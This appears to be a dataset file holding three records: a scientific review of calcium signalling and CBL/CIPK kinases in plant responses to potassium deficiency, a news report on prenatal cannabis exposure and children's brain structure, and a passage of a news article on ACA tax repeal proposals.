text
stringlengths 1
3.78M
| meta
dict |
|---|---|
1. Introduction {#sec1-ijms-19-03456}
===============
Potassium (K^+^) is an essential macronutrient and is essential for plant growth and development \[[@B1-ijms-19-03456]\]. K^+^ is associated with or involved in several physiological processes that support plant growth and development, such as photosynthesis, enzyme activation, osmoregulation, electrical neutralization, pH and ion homeostasis, anion-cation balance, membrane electrical potential, protein and starch synthesis, sugar and nutrient transport, and stomatal movement \[[@B2-ijms-19-03456]\]. K^+^ also plays a major role in enhancing the tolerance of plants to various stresses \[[@B3-ijms-19-03456],[@B4-ijms-19-03456]\]. The concentrations of K^+^ in the soil solution range from only 0.1--1 mM, and can be much lower at the root surface due to local depletion \[[@B5-ijms-19-03456]\]. K^+^ deficiency in most arable fields is limiting for optimal plant growth \[[@B6-ijms-19-03456],[@B7-ijms-19-03456]\]. K^+^ deprivation leads to a strong increase in chlorophyll degradation; K^+^ deficiency-related symptoms include brown scorching and curling of leaf tips, as well as interveinal chlorosis \[[@B8-ijms-19-03456]\]. Reduced leaf area under K^+^ deficiency has also been reported \[[@B9-ijms-19-03456],[@B10-ijms-19-03456]\]. In addition, K^+^ deficiency affects root development, as primary root growth is negatively affected \[[@B11-ijms-19-03456],[@B12-ijms-19-03456]\]. Various K^+^ shortage-activated signaling cascades exist; these cascades involve reactive oxygen species (ROS) \[[@B13-ijms-19-03456]\], phytohormones (ethylene, auxin, and jasmonic acid) \[[@B14-ijms-19-03456],[@B15-ijms-19-03456]\], calcium \[[@B16-ijms-19-03456]\], and phosphatidic acid \[[@B17-ijms-19-03456]\]. Among these signaling cascades, calcium signaling is the most important signaling system within plant cells. In this review, the possible roles of calcium signaling in plant responses to low-K^+^ stress are discussed ([Figure 1](#ijms-19-03456-f001){ref-type="fig"}).
2. Molecular Mechanisms of Calcium Signaling Involved in Plant Responses to K^+^ Deficiency {#sec2-ijms-19-03456}
===========================================================================================
2.1. Generation of Calcium in Response to K^+^ Deficiency {#sec2dot1-ijms-19-03456}
---------------------------------------------------------
The concentration and distribution of cytosolic free calcium form the basis of calcium signaling. Under normal conditions, levels of cytosolic free calcium are low, but some organelles, including the vacuole, endoplasmic reticulum, mitochondria and so on, contain high concentrations of calcium, henceforth referred to as the calcium pool. Elevations in intracellular calcium \[Ca^2+^\]~i~ have been recorded in the responses of both lower and higher plants to a wide variety of both biotic and abiotic stimuli \[[@B18-ijms-19-03456],[@B19-ijms-19-03456]\]. In plants, \[Ca^2+^\]~i~ levels that are altered in response to multiple abiotic stresses result in calcium signatures that exhibit temporal and spatial features \[[@B20-ijms-19-03456],[@B21-ijms-19-03456],[@B22-ijms-19-03456]\]. These calcium signatures can take the form of single calcium transients \[[@B23-ijms-19-03456],[@B24-ijms-19-03456]\], oscillations \[[@B25-ijms-19-03456],[@B26-ijms-19-03456],[@B27-ijms-19-03456]\], or repeated spikes \[[@B28-ijms-19-03456],[@B29-ijms-19-03456]\]. Alterations to cytosolic calcium signals can be perceived by calcium sensors, which can result in a series of downstream responses, such as protein modification and transcriptional regulation \[[@B30-ijms-19-03456],[@B31-ijms-19-03456],[@B32-ijms-19-03456],[@B33-ijms-19-03456],[@B34-ijms-19-03456],[@B35-ijms-19-03456],[@B36-ijms-19-03456],[@B37-ijms-19-03456],[@B38-ijms-19-03456]\]. Calcium sensors in *Arabidopsis* root are involved in both K^+^ uptake and responses to K^+^ deficiency. Low K^+^ induces \[Ca^2+^\] to increase in *Arabidopsis* guard cells \[[@B39-ijms-19-03456]\] and in the pollen tubes \[[@B40-ijms-19-03456]\]. The results of a recent study revealed that K^+^ deficiency triggers two successive but distinct calcium signals in roots, and that those two signals exhibit spatial and temporal specificity \[[@B16-ijms-19-03456]\]. Calcium flows into or out of the cytoplasm via calcium channels located within the plasma membrane and endomembrane system \[[@B18-ijms-19-03456],[@B41-ijms-19-03456],[@B42-ijms-19-03456]\]. Most calcium channels are nonselective for ions \[[@B41-ijms-19-03456],[@B43-ijms-19-03456]\]. In plants, these calcium channels mainly include nonspecific cation channels located within the cell membrane \[[@B43-ijms-19-03456],[@B44-ijms-19-03456]\], including members of the cyclic nucleotide-gated channel (CNGC) family \[[@B26-ijms-19-03456],[@B45-ijms-19-03456],[@B46-ijms-19-03456],[@B47-ijms-19-03456]\] and the glutamate receptor channel (GLR) family \[[@B48-ijms-19-03456],[@B49-ijms-19-03456],[@B50-ijms-19-03456]\], hyperosmolality-gated calcium-permeable channels \[[@B51-ijms-19-03456],[@B52-ijms-19-03456]\], and annexins proteins \[[@B53-ijms-19-03456]\], and mechanosensitive channels (MCAs) \[[@B54-ijms-19-03456]\], as well as two-pore calcium channels (TPCs) \[[@B55-ijms-19-03456],[@B56-ijms-19-03456]\] located in the vacuolar membrane. However, the mechanisms of their action remain unclear.
2.2. Initial Sensing of K^+^ Deficiency by Calcium Channels {#sec2dot2-ijms-19-03456}
-----------------------------------------------------------
In plants, although some calcium channel activation occurs via depolarization \[[@B57-ijms-19-03456],[@B58-ijms-19-03456],[@B59-ijms-19-03456]\], most channels operate at highly-negative membrane voltages, and are often described as hyperpolarization-activated calcium channels (HACCs) \[[@B41-ijms-19-03456],[@B53-ijms-19-03456],[@B60-ijms-19-03456],[@B61-ijms-19-03456],[@B62-ijms-19-03456],[@B63-ijms-19-03456]\]. After low-K^+^ stress, calcium channels located within the root epidermis and root hair zone can be activated by hyperpolarization of the PM \[[@B60-ijms-19-03456],[@B64-ijms-19-03456]\]. Calcium increases in the cytosol can activate additional calcium channels located within the inner membrane, thereby causing the calcium pool to release calcium. For instance, two-pore channel 1 (TPC1), which is a voltage-gated channel and is located within the vacuolar membrane, is involved in the influx of calcium to the cytoplasm from the vacuole \[[@B55-ijms-19-03456]\]. In addition, the low-K^+^-inducing \[Ca^2+^\]~i~ increase is also mediated by ROS-activated calcium channels in the PM \[[@B61-ijms-19-03456]\]. ROS are important signaling molecules that mediate many physiological stimuli and lead to the generation of \[Ca^2+^\]~i~ signals under stress \[[@B65-ijms-19-03456],[@B66-ijms-19-03456]\]; increases in ROS are induced by K^+^ deficiency \[[@B67-ijms-19-03456],[@B68-ijms-19-03456]\]. Elevated \[Ca^2+^\]~i~ can induce NADPH oxidase-mediated production of ROS, which in turn activates calcium-permeable ion channels, thereby resulting in further calcium influx \[[@B62-ijms-19-03456],[@B69-ijms-19-03456]\]. Additionally, ROS have been also suggested to participate in long distance signaling with calcium, and are likely involved in generating calcium waves \[[@B70-ijms-19-03456],[@B71-ijms-19-03456],[@B72-ijms-19-03456],[@B73-ijms-19-03456]\].
2.3. Calcium Sensors Involved in the Sensing of K^+^ Deprivation {#sec2dot3-ijms-19-03456}
----------------------------------------------------------------
How plant cells sense transient increases in \[Ca^2+^\]~i~ in response to low-K^+^ stress is ambiguous. Calcium signals are likely perceived by calcium sensors, decoded, and further transduced. Different calcium sensors must exist in the cytoplasm of plant cells so that different calcium signals can be recognized. In higher plants, putative calcium sensors include CaM, CML, CBL, and CDPK, which are derived mainly from four gene families \[[@B18-ijms-19-03456],[@B74-ijms-19-03456],[@B75-ijms-19-03456],[@B76-ijms-19-03456],[@B77-ijms-19-03456]\] and which are collectively encoded by approximately 100 genes in the *Arabidopsis* genome \[[@B30-ijms-19-03456]\]. Calcium sensors can be divided into two types: sensor responders and sensor relays. Sensor responders, such as CDPK, usually undergo a calcium-induced conformational change that alters the protein's own structure and activity. On the other hand, sensor relays, such as CaM, CML, and CBL, lack responder domains; these sensors first combine with calcium and subsequently undergo a conformational change that is relayed to an interacting partner. The interacting partner then responds with some change in its enzyme activity or structure. The two types of calcium sensors differ by their action: sensor responders function via intramolecular interactions (e.g., CDPK), whereas sensor relays function via biomolecular interactions (e.g., CBL interact with CIPK) \[[@B78-ijms-19-03456],[@B79-ijms-19-03456]\].
Calcium sensor responders mainly consist of CDPKs. CDPKs, which are a class of calcium-dependent protein kinases first discovered in plants, are serine/threonine protein kinases, and are probably the best-studied protein kinases involved in signal transduction in plants \[[@B76-ijms-19-03456],[@B77-ijms-19-03456],[@B80-ijms-19-03456]\]. CDPKs are monomeric proteins with a molecular mass of 40 to 90 kDa, and consist of five domains: an N-terminal variable domain, a protein kinase catalytic domain, an autoinhibitory domain, a regulatory domain, and a C-terminal domain of variable length \[[@B75-ijms-19-03456],[@B76-ijms-19-03456],[@B77-ijms-19-03456]\]. The autoinhibitory domain contains a pseudo-substrate sequence that can interact with the active site and inhibit its activity. Once a calcium signal is generated, the autoinhibition of CDPKs is relieved; therefore, the CDPKs become activated, and the activated CDPKs can subsequently phosphorylate target enzymes or molecules, leading to physiological responses \[[@B81-ijms-19-03456],[@B82-ijms-19-03456],[@B83-ijms-19-03456]\]. In addition to CDPKs, Ca^2+^/CaM-regulated kinases and chimeric Ca^2+^ and Ca^2+^/CaM regulated kinases (CCaMKs) are also members of this family of Ca^2+^-regulated protein kinases \[[@B30-ijms-19-03456]\]. CPK10 is involved in the Ca^2+^-dependent inhibition of K^+^~in~ channels in guard cells \[[@B84-ijms-19-03456]\]. Together, CPK11 and CPK24 mediate Ca^2+^-dependent inhibition of the activity of shaker pollen inward K^+^ channels (SPIK/AKT6) in pollen tubes, further increasing our understanding of the CDPK-mediated regulatory mechanisms of K^+^ channels \[[@B40-ijms-19-03456]\]. CPK13 specifically inhibits guard cell-expressed KAT2 and KAT1 shaker K^+^ channels \[[@B85-ijms-19-03456]\]. The results of a recent study \[[@B86-ijms-19-03456]\] showed that two *CDPKs* are up-regulated in tobacco seedlings under low-K^+^ stress, whereas *OsCPK9* and *OsCCaMK1* are down-regulated in rice root responses to K^+^ deficiency \[[@B87-ijms-19-03456]\].
Calcium sensor relays mainly consist of CaMs and CML \[[@B88-ijms-19-03456]\]; CaM is an important member of this class of calcium sensor proteins. Plant CaMs are small, acidic proteins with a molecular weight ranging from 16.7--16.8 kDa; CaM contains 4 EF-hand repeated domains that bind 4 individual Ca^2+^ ions. In addition, the four binding sites display cooperativity in Ca^2+^ binding; as such, unbound CaM is fully opened \[[@B89-ijms-19-03456],[@B90-ijms-19-03456]\]. CaM binding with Ca^2+^ leads to a conformational change. This change exposes the hydrophobic surface of CaM, which helps to interact with target proteins in a Ca^2+^-dependent manner, altering their activities. CaM binding with Ca^2+^ forms an activated Ca^2+^-CaM complex, and the binding of this complex to target enzymes leads to their activation \[[@B91-ijms-19-03456],[@B92-ijms-19-03456]\]. CaM has no catalytic activity of its own, but upon binding with Ca^2+^, CAM modulates the activities of several enzymes and non-enzymic proteins involved in a variety of cellular processes \[[@B93-ijms-19-03456],[@B94-ijms-19-03456],[@B95-ijms-19-03456]\]. CML also acts in signaling 'cross-talk' and is involved in the co-ordination of plant responses to biotic and abiotic stresses \[[@B21-ijms-19-03456],[@B96-ijms-19-03456],[@B97-ijms-19-03456]\]. CML25 is an important transducer involved in the Ca^2+^ ions-mediated regulation of K^+^ influx \[[@B98-ijms-19-03456]\]. Ma et al. (2012) \[[@B87-ijms-19-03456]\] reported that the expression levels of the calcium sensor protein genes *OsCML1*, *OsCML18*, *OsCML20*, and *OsCML31* are up-regulated in rice under low-K^+^ stress. Several genes that code for members of CML families are differentially expressed in tobacco seedlings under low-K^+^ stress \[[@B99-ijms-19-03456]\]. In addition, a Raf-like MAPKK kinase (AtILK1) directly interacts with AtHAK5 in conjunction with the AtCML9, promoting AtHAK5 accumulation on the membrane \[[@B100-ijms-19-03456]\]. These results indicate that calcium sensor proteins may play vital roles in connecting calcium signaling and downstream target proteins during plant responses to K^+^ deficiency.
Another important member of the calcium sensor relays is CBL, which, like CaM and CML, has been shown to lack responder domains \[[@B101-ijms-19-03456]\]. CBLs and CBL-interacting protein kinases (CIPKs) often form the CBL/CIPK complexes, perceiving calcium signals and relaying the signals to downstream responses in plants under low-K^+^ stress \[[@B31-ijms-19-03456],[@B32-ijms-19-03456],[@B33-ijms-19-03456],[@B34-ijms-19-03456],[@B35-ijms-19-03456],[@B37-ijms-19-03456],[@B102-ijms-19-03456],[@B103-ijms-19-03456],[@B104-ijms-19-03456],[@B105-ijms-19-03456]\].
3. Role of the CBL/CIPK Complex in Response to K^+^ Deficiency {#sec3-ijms-19-03456}
==============================================================
3.1. CBL Proteins {#sec3dot1-ijms-19-03456}
-----------------
CBL proteins, which are involved in the salt-overly-sensitive (SOS) pathway of salt stress signal transduction, were first identified in *Arabidopsis* \[[@B101-ijms-19-03456]\]. CBL proteins in plants share significant sequence similarities with the calcineurin B subunit in yeast and the neuronal calcium sensors in animals \[[@B74-ijms-19-03456],[@B101-ijms-19-03456],[@B106-ijms-19-03456]\]. In *Arabidopsis*, CBLs are encoded by at least 10 members of a multigene family \[[@B106-ijms-19-03456],[@B107-ijms-19-03456],[@B108-ijms-19-03456]\]. Each CBL protein harbors four EF-hand motifs that facilitate Ca^2+^ binding; in all CBL proteins, these motifs are arranged in fixed spacing. Therefore, the weights of CBLs are nearly equal (23--26 kD); the N-terminal and C-terminal domains account for the differences in CBL weights. Unlike in other species, in *Arabidopsis*, the first CBL EF-hand domain consists of an unconventional 14 amino acids, not 12 amino acids; this *Arabidopsis* CBL EF-hand domain likely lacks the normal amino acid numbers required for Ca^2+^ binding \[[@B107-ijms-19-03456],[@B109-ijms-19-03456]\]. The crystal structures of AtCBL2 and AtCBL4 indicate that two calcium ions are coordinated in the first and fourth EF-hand motifs despite the presence of two additional amino acids \[[@B110-ijms-19-03456],[@B111-ijms-19-03456]\]. Sequence variations in EF-hand motifs most likely control the overall Ca^2+^-binding affinity of individual CBL proteins. This phenomenon may explain why plants can decode different calcium signals \[[@B109-ijms-19-03456],[@B112-ijms-19-03456],[@B113-ijms-19-03456],[@B114-ijms-19-03456],[@B115-ijms-19-03456],[@B116-ijms-19-03456]\].
With the exception of CBL10, whose hydrophobic N-terminal region is a special transmembrane domain, other CBLs can be classified into one of two categories based on variations in their N-terminal domain. The first category represents CBL proteins with a short N-terminal region, which consist of 27--32 amino acids. Examples in this category include CBL1, CBL4, CBL5, CBL8, and CBL9; other CBL proteins, with exception of CBL8, all have a MGXXX(S/T) consensus sequence for N-myristoylation \[[@B117-ijms-19-03456]\]. The second category represents CBL proteins with an extended N-terminal region, which consist of 41--43 amino acids. Examples in this category include CBL2, CBL3, and CBL6, which lack recognizable lipid modifications \[[@B117-ijms-19-03456]\]. Sequence comparisons place CBL7 within this category; therefore, the CBL7 protein appears to have lost its N-terminal extension during evolution \[[@B106-ijms-19-03456],[@B112-ijms-19-03456]\].
CBL proteins were first identified in model plant *Arabidopsis* \[[@B74-ijms-19-03456],[@B101-ijms-19-03456]\]; subsequent bioinformatics analysis has revealed that these kinds of proteins also exist in other species. The *Oryza sativa* (rice) genome contains 10 genes that encode CBL proteins \[[@B108-ijms-19-03456]\], and the *Populus trichocarpa* (poplar) genome also contains 10 genes that encode CBL proteins \[[@B118-ijms-19-03456]\]. The fully-sequenced genomes of the dicotyledonous plant *Vitis vinifera* (grape) and the monocotyledonous plant *Sorghum bicolor* (sorghum) have been analyzed in attempt to detect the presence of CBLs; these analyses revealed 8 CBLs in grape and 6 CBLs in sorghum \[[@B112-ijms-19-03456]\]. *Gossipium raimondii* (cotton) was found to contain the highest number of CBL genes (13) among the 38 plant species analyzed \[[@B119-ijms-19-03456]\]. And 19 members of the *BrrCBL* genes were identified in *Brassica rapa* var. *rapa* (turnip) \[[@B120-ijms-19-03456]\]. A comparative analysis of CBLs from all these species further supports the classification of these proteins according to their N-terminal domain \[[@B112-ijms-19-03456]\]. An analysis of the genomic sequences of algae and nonvascular plants revealed that the genome of the moss *Physcomitrella patens* encodes 4 CBL proteins, and that the genome of the fern *Selaginella moellendorffii* also encodes 4 CBL proteins. In addition, one CBL protein was identified in the green alga *Chlorella* sp., as well as in the genome of the smallest known free-living eukaryotic alga, *Ostreococcus tauri* \[[@B121-ijms-19-03456]\]. In general, these studies of lower plants have enabled us to address the general evolutionary aspects of this signaling network \[[@B112-ijms-19-03456]\].
3.2. CBL-Interacting Protein Kinases (CIPKs) {#sec3dot2-ijms-19-03456}
--------------------------------------------
Protein kinases that specifically interact with CBL proteins have been identified; these kinases are referred to as CIPKs, which were mentioned earlier with salt-overly-sensitive 2 (SOS2), SOS3-interacting proteins (SIPs), and protein kinase S (PKS) \[[@B122-ijms-19-03456],[@B123-ijms-19-03456],[@B124-ijms-19-03456]\]. All of these CIPKs share a typical two-domain structure comprising an N-terminal kinase domain and a C-terminal catalytic domain, which are separated by a junction domain \[[@B109-ijms-19-03456],[@B112-ijms-19-03456]\]. Sucrose non-fermenting 1 (SNF1)-related protein kinases (SnRKs) are important kinases in plants, and exhibit high sequence homology to metabolic regulators found in mammals (5′-AMP-activated protein kinases \[AMPKs\]) and in yeast (SNF1); the three combined kinases form the protein kinase superfamily. Amino acid sequence identification and expression pattern analyses have revealed that the SnRK family of protein kinases can be categorized into three classes: SnRK1, SnRK2, and SnRK3 \[[@B125-ijms-19-03456],[@B126-ijms-19-03456],[@B127-ijms-19-03456]\]. *Arabidopsis* CIPKs constitute a kind of serine-threonine kinase, and have a highly-conserved N-terminal catalytic domain; these proteins have been classified as SnRK3s \[[@B125-ijms-19-03456],[@B128-ijms-19-03456]\].
The N-terminal domain of a protein kinase contains a conserved activation loop. Assays of mutants revealed that the Thr168, Ser156, or Tyr175 to Asp change in the activation loop of CIPK24/SOS2 protein kinase \[[@B129-ijms-19-03456],[@B130-ijms-19-03456],[@B131-ijms-19-03456]\], the Thr178 to Asp change in the activation loop of CIPK9/PKS6 \[[@B132-ijms-19-03456]\], the Thr161 to Asp change in the activation loop of CIPK8/PKS11 \[[@B133-ijms-19-03456]\], and the Thr183 to Asp change in the activation loop of CIPK3 \[[@B134-ijms-19-03456]\] can cause strong activation of CIPK protein kinases, even in the absence of Ca^2+^ or CBLs. Thus, these several conserved amino acid residues may be phosphorylation sites of CIPK protein kinases, whose phosphorylation results in the activation of CIPK \[[@B112-ijms-19-03456]\]. Furthermore, an additional phosphorylation site (Ser 228) has been identified as a target of autophosphorylation activity in the C-terminal region of the CIPK24/SOS2 kinase domain \[[@B135-ijms-19-03456]\].
Within the otherwise divergent C-terminal regulatory domain, CIPKs have a conserved domain, a NAF motif, and a 24-aminoacid domain with the conserved amino acids N, A, and F that are required for the CBL-CIPK interactions; the NAF motif is also referred to as a FISL motif because of the complete conservation of the six amino acid residues A, F, I, S, L, and F. The NAF/FISL motif of CIPKs is sufficient for mediating protein interactions with all CBL proteins \[[@B128-ijms-19-03456],[@B129-ijms-19-03456],[@B136-ijms-19-03456],[@B137-ijms-19-03456]\]. The NAF/FISL motif is also necessary and sufficient for keeping CIPKs inactive, and serves as an autoinhibitory domain; removal of the NAF/FISL domain can increase the activity of CIPKs \[[@B129-ijms-19-03456],[@B132-ijms-19-03456]\].
Another important functional domain is the protein phosphatase interaction (PPI) motif in the C-terminal region of CIPKs; this motif is adjacent to the NAF/FISL motif. The PPI motif consists of 37 amino acid residues, and was first identified in CIPK24/SOS2, which is necessary and sufficient for interaction with ABA-INSENSITIVE 2 (ABI2) \[[@B138-ijms-19-03456]\]. The PPI motif is conserved in CIPK protein kinases; all of these motifs interact with 2C-type protein phosphatase (PP2C) \[[@B34-ijms-19-03456],[@B128-ijms-19-03456],[@B138-ijms-19-03456],[@B139-ijms-19-03456]\]. In plants, PP2C is a strong negative regulator of the stress-activated, mitogen-activated protein kinase (MAPK) pathway, which is involved in plant responses to abiotic stresses and growth regulation \[[@B140-ijms-19-03456],[@B141-ijms-19-03456],[@B142-ijms-19-03456]\]. PP2C interaction with CIPK results in the complete replacement of the combination between CBL proteins and the NAF domain or a portion of the PPI domain of CIPKs \[[@B112-ijms-19-03456]\]. The dissociation of CBL proteins from the NAF domain of CIPK prevents the autophosphorylation of CIPK, thereby transforming the kinase into an inactive state \[[@B129-ijms-19-03456],[@B132-ijms-19-03456]\].
3.3. Involvement of the CBL/CIPK Complex in the Sensing of K^+^ Deficiency {#sec3dot3-ijms-19-03456}
--------------------------------------------------------------------------
Some CBL protein family members that interact with CIPKs function in plant responses to K^+^ deficiency ([Figure 2](#ijms-19-03456-f002){ref-type="fig"}) \[[@B31-ijms-19-03456],[@B32-ijms-19-03456],[@B33-ijms-19-03456],[@B34-ijms-19-03456],[@B35-ijms-19-03456],[@B37-ijms-19-03456],[@B102-ijms-19-03456],[@B103-ijms-19-03456],[@B104-ijms-19-03456],[@B105-ijms-19-03456]\]. The first CBL proteins identified to be involved in the K^+^ deficiency response were the PM-localized calcium sensors CBL1 and CBL9; these sensors interact with the cytoplasm-localized Ser/Thr kinase CIPK23, and recruit it to the root cell PM, where the complex subsequently phosphorylates AKT1 \[[@B31-ijms-19-03456],[@B102-ijms-19-03456],[@B143-ijms-19-03456]\]. AKT1, a shaker inward K^+^ channel \[[@B144-ijms-19-03456],[@B145-ijms-19-03456],[@B146-ijms-19-03456]\], is considered a major component involved in K^+^ uptake in *Arabidopsis* root cells under low-K^+^ conditions \[[@B147-ijms-19-03456],[@B148-ijms-19-03456],[@B149-ijms-19-03456]\]. In addition, AtKC1, a K^+^ channel regulatory subunit that negatively modulates many inward K^+^ channels, interacts with AtAKT1, forming an AtAKT1-AtKC1 heteromeric channel, and modulates AtAKT1 activity together with AtCIPK23, to synergistically regulate AtAKT1-mediated low-K^+^ stress responses \[[@B150-ijms-19-03456],[@B151-ijms-19-03456]\]. Another CBL protein, CBL10, was recently shown to be a negative regulator of the AKT1 channel. CBL10 may compete with CIPK23 for binding to AKT1, and CBL10 interacts directly with the AKT1 channel and inhibits AKT1-mediated K^+^ flux into the cytoplasm. In *Arabidopsis*, this inhibition ultimately maintains K^+^ homeostasis under ion stress conditions in a CIPK-independent manner \[[@B35-ijms-19-03456]\]. The calcium sensor CBL4, together with the interacting protein kinase CIPK6, modulates the activity and PM targeting of the K^+^ channel AKT2 in *Arabidopsis*; CBL4 in conjunction with CIPK6 mediates the translocation of AKT2 from the endoplasmic reticulum membrane to the PM in a kinase-interaction-dependent but phosphorylation-independent manner in plant cells, and enhances AKT2 activity in oocytes \[[@B33-ijms-19-03456]\]. AKT2 is unique among the nine shaker-type K^+^ channel subunits expressed in *Arabidopsis*, because AKT2 exhibits weak inward-rectifying activity in oocytes \[[@B152-ijms-19-03456],[@B153-ijms-19-03456]\]; several studies have suggested that this channel is regulated by unknown protein kinases and by the protein phosphatase PP2CA \[[@B154-ijms-19-03456],[@B155-ijms-19-03456],[@B156-ijms-19-03456]\]. A recent study demonstrated that CBL3 and CIPK9 work together and function in K^+^ homeostasis under low-K^+^ stress; this complex mediates the regulation of putative tonoplast-localized outward K^+^ channels \[[@B104-ijms-19-03456]\]. CIPK9 is the CIPK family member which is most similar to CIPK23, and CIPK9 loss of function results in a phenotype that is tolerant to K^+^ deficiency conditions \[[@B31-ijms-19-03456]\]; in contrast, CIPK9 overexpression lines are sensitive to K^+^ deficiency stress. Furthermore, because K^+^ deficiency symptoms first appear in relatively old leaves, CIPK9 may be involved in K^+^ reallocation from older leaves to the younger leaves during K^+^ deficiency \[[@B32-ijms-19-03456],[@B157-ijms-19-03456]\]. In addition, the AtCBL1/AtCIPK23 complex can phosphorylate AtHAK5, which is a KT/KUP/HAK-type transporter whose expression occurs mainly in the roots \[[@B37-ijms-19-03456]\]. The transcription of *HAK5* is induced by K^+^ deficiency via the transcription factor RAP2.11 \[[@B147-ijms-19-03456],[@B158-ijms-19-03456]\], which is considered to function predominantly in the uptake of K^+^ from the soil \[[@B37-ijms-19-03456],[@B145-ijms-19-03456],[@B147-ijms-19-03456],[@B159-ijms-19-03456],[@B160-ijms-19-03456],[@B161-ijms-19-03456]\].
These CBLs-CIPKs-AKT1/AKT2/HAK5 pathways are important mechanisms in the response to low-K^+^ stress in *Arabidopsis*. Similar mechanisms have also been identified in other plant species. The OsCBL1-OsCIPK23-OsAKT1 pathway was identified in rice \[[@B36-ijms-19-03456]\]. Rice OsCIPKs show high amino acid sequence similarity to *Arabidopsis* CIPKs; eight OsCIPK genes *(OsCIPK2*, *6*, *9, 10*, *14*, *15*, *23*, and *26*) are upregulated under low-K^+^ stress, whereas two OsCIPK genes (*OsCIPK29* and *31*) are down-regulated \[[@B108-ijms-19-03456]\]. Another study demonstrated that the AtCBL9/AtCIPK23 kinase complex activates DmKT1, which has been identified as a K^+^-selective channel of voltage-dependent high capacity and low affinity; the first proton-driven high-affinity K^+^ transporter with weak selectivity (DmHAK5) is also activated by the same kinase complex \[[@B38-ijms-19-03456]\].
Furthermore, CBL/CIPK (CIPK6, CIPK16, and CIPK23) complexes can interact with the AKT1-interacting PP2CA (AIP1) and AIP1 homologue (AIP1H), both of which are protein phosphatase PP2Cs, via the direct binding of the kinase domain of CIPKs to indirectly deactivate AKT1 by inhibiting phosphorylation. Several CBLs have been reported to interact with and inhibit the activity of PP2Cs, thereby enhancing CIPK-induced AKT1 activation; this phenomenon forms a kinase/phosphatase partnership that enables AKT1 activity to be switched on and off \[[@B34-ijms-19-03456],[@B103-ijms-19-03456]\]. In addition, AtPP2CA can interact physically and functionally with AKT2, and can inhibit AKT2-mediated K^+^ currents via the direct phosphorylation of AKT2 \[[@B154-ijms-19-03456]\].
4. Conclusions and Perspectives {#sec4-ijms-19-03456}
===============================
K^+^ is an essential macronutrient and is associated with or involved in several physiological processes supporting plant growth and development, such as photosynthesis, enzyme activation, osmoregulation, electrical neutralization, pH and ion homeostasis, anion-cation balance, membrane electrical potential, protein and starch synthesis, sugar and nutrient transport, and stomatal movements. K^+^ deprivation leads to a strong increase in chlorophyll degradation. Various K^+^ shortage-activated signaling cascades exist; these cascades involve ROS, phytohormones, calcium, and phosphatidic acid. Among these signaling cascades, calcium signaling is the most important signaling system in plant cells. Thus far, our knowledge on the molecular mechanisms of calcium signaling in plant responses to K^+^ deficiency is still limited.
Calcium plays a critical role in plant responses to low-K^+^ stress. Although tremendous progress has been made in understanding plant responses to low-K^+^ stress, one important question that remains unanswered is how calcium as a messenger can relay information that distinguishes different extracellular signals, triggering different processes and specific responses in cells. The results of the previous studies suggest that K^+^ deficiency can induce changes in intracellular calcium levels that exhibit temporal and spatial features. The decoding of calcium signatures in plant cells might depend largely on the presence of various calcium sensors, including CaM, CML, CDPK, and CBL, as well as their targets. In particular, the CBL-CIPK signaling system is a central and critical signaling system for decoding calcium signatures and for translating those calcium signatures into downstream responses to K^+^ deficiency.
Over the last two decades, the extensive genomic, genetic, and molecular physiological studies have begun to shed light on the transport regulation and signaling mechanisms of plant responses to K^+^ deficiency. Further identification of important calcium signaling components involved in plant responses to K^+^ deficiency is important. Detailed functional characterization of these calcium-signaling components is also needed to elucidate the complex network of plant signaling in response to K^+^ deficiency. Even though many K^+^ transporters and channels in higher plants have been functionally characterized, specific K^+^ sensors remain unknown. Thus, future investigations should give attention to further functional characterization of K^+^ sensors and to the regulatory mechanisms of these sensors. Given that K^+^ deficiency could induce \[Ca^2+^\]~i~ to increase in *Arabidopsis* guard cells and in the pollen tubes or triggers calcium signals in *Arabidopsis* roots, the perception-defective of K^+^ deficiency mutants are likely to be screened via detection of the plant calcium signal.
We thank Zhen-Ming Pei, Zhangli Hu, two anonymous reviewers and the Editor for their valuable comments on the manuscript.
This work was funded by China Postdoctoral Science Foundation, grant number (2018M633109).
The authors declare no conflict of interest.
{#ijms-19-03456-f001}
{#ijms-19-03456-f002}
|
{
"pile_set_name": "PubMed Central"
}
|
Smoking pot during pregnancy may harm baby's brain
Smoking cannabis during pregnancy may lead to abnormal brain structure in children, a new study has warned.
Compared with unexposed children, those who were prenatally exposed to cannabis had a thicker prefrontal cortex, a region of the brain involved in complex cognition, decision-making, and working memory, the findings showed.
"This study is important because cannabis use during pregnancy is relatively common and we know very little about the potential consequences of cannabis exposure during pregnancy and brain development later in life," said study author Hanan El Marroun from Erasmus University Medical Centre in The Netherlands.
An estimated two-thirteen per cent of women worldwide use cannabis during pregnancy. Previous studies have identified short and long-term behavioural consequences of prenatal cannabis exposure, but effects on brain morphology were unknown.
"Understanding what happens in the brain may give us insights in how children develop after being exposed to cannabis," El Marroun said.
For the study, the researchers used structural magnetic resonance imaging to examine the brains of 54 children, six to eight years old, who were prenatally exposed to cannabis.
Most of the children exposed to cannabis were also exposed to tobacco, so the researchers compared them to 96 children prenatally exposed to tobacco only, as well as to 113 control children with no exposure.
The children were part of a prospective population-based study in The Netherlands.
Comparing tobacco-exposed children with children exposed to both tobacco and cannabis revealed differences in the cortical thickness, suggesting that cannabis exposure has different effects than tobacco.
Subscribe to our Newsletters
Earlier people used to visit a pharmacy or a medical store only when they used to be sick but today there is an evolving trend. Now people have suddenly realized that there is a huge potential in being healthy.
|
{
"pile_set_name": "Pile-CC"
}
|
There’s much talk on Capitol Hill about the tax cuts included in the Republican health plans, but unless you are a frequent user of tanning beds or have personal wealth that puts you in the top 1 percent, you might not feel much effect from them.
Specifically, both the House and the Senate plan would change or eliminate more than a dozen taxes that were levied to help pay for the Affordable Care Act’s insurance subsidies and to bolster Medicare and expand Medicaid. Republicans and other ACA critics have argued the taxes are onerous on businesses and families.
The Congressional Budget Office estimated that the Senate proposal would result in $700 billion in lost revenue from the federal Treasury over the next 10 years.
Here are three things you need to know about them:
What are these taxes targeted for repeal?
The biggest ones fall into two buckets:
In the first bucket is a 0.9 percent increase in the existing Medicare payroll tax on income above $200,000 for individuals or $250,000 for couples.
Use Our Content This KHN story can be republished for free ( details ).
There is also a 3.8 percent tax on net investment income — as in stocks, bonds, interest and capital gains — that kicks in after $200,000 for individuals and $250,000 for couples. As Senate leaders consider revisions to the bill, some senators — including Republican Bob Corker of Tennessee — suggest leaving the investment tax in place to provide more money for subsidies, but others object to that idea. It would also present a major difference from the House-passed bill.
Still, if both of those taxes in the ACA were repealed, high-income Americans together would pay $230.8 billion less in taxes over 10 years, according to the CBO analysis.
